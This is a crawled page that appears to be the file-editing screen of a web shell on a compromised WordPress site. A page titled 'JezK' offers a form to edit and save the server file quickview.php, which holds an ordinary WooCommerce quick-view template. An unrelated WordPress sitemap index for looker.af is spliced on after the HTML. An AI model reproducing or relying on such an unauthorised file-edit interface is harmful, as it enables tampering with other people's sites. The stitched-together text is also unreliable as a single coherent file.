
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: quickview.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
	$product = wc_get_product($args[&#039;id&#039;]);
	$attachment_ids = $product-&gt;get_gallery_image_ids();
	setup_postdata($product-&gt;get_id());
?&gt;

&lt;div class=&quot;mfn-popup mfn-popup-940 mfn-popup-quickview woocommerce&quot;&gt;
	&lt;div class=&quot;mfn-popup-content&quot;&gt;
		&lt;span class=&quot;mfn-close-popup mfn-close-icon&quot;&gt;&lt;span class=&quot;icon&quot;&gt;&amp;#10005;&lt;/span&gt;&lt;/span&gt;
		&lt;div class=&quot;mfn-popup-content-wrapper product&quot;&gt;

			&lt;div class=&quot;mfn-popup-content-col mfn-popup-content-photos&quot;&gt;
				&lt;div class=&quot;mfn-quickview-slider&quot;&gt;
					&lt;div class=&quot;mfn-qs-one mfn-qs-one-first&quot;&gt;&lt;?php echo get_the_post_thumbnail($args[&#039;id&#039;], &#039;large&#039;); ?&gt;&lt;/div&gt;
					&lt;?php if(count($attachment_ids) &gt; 0): foreach( $attachment_ids as $attachment_id ) { ?&gt;
						&lt;div class=&quot;mfn-qs-one&quot;&gt;&lt;?php echo wp_get_attachment_image($attachment_id, &#039;large&#039;); ?&gt;&lt;/div&gt;
				  &lt;?php } endif; ?&gt;
				&lt;/div&gt;
			&lt;/div&gt;

			&lt;div class=&quot;mfn-popup-content-col mfn-popup-content-text&quot;&gt;
        &lt;div class=&quot;mfn-popup-content-text-wrapper&quot;&gt;
            &lt;h3 class=&quot;heading&quot;&gt;&lt;?php echo get_the_title($args[&#039;id&#039;]); ?&gt;&lt;/h3&gt;
            &lt;p class=&quot;price&quot;&gt;&lt;?php echo $product-&gt;get_price_html(); ?&gt;&lt;/p&gt;
            &lt;div class=&quot;excerpt&quot;&gt;
              &lt;?php echo apply_filters( &#039;the_excerpt&#039;, get_the_excerpt( $args[&#039;id&#039;] ) ); ?&gt;
            &lt;/div&gt;
            &lt;div class=&quot;mfn-product-add-to-cart&quot;&gt;
              &lt;?php
                /*$funname = &#039;woocommerce_&#039;.$product-&gt;get_type().&#039;_add_to_cart&#039;;
                $funname(); */
                call_user_func(&#039;woocommerce_&#039;. $product-&gt;get_type() .&#039;_add_to_cart&#039;);
              ?&gt;
            &lt;/div&gt;
            &lt;?php echo sc_product_meta(array(), $product); ?&gt;
        &lt;/div&gt;
			&lt;/div&gt;

		&lt;/div&gt;
	&lt;/div&gt;
&lt;/div&gt;

&lt;?php wp_reset_postdata(); ?&gt;
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
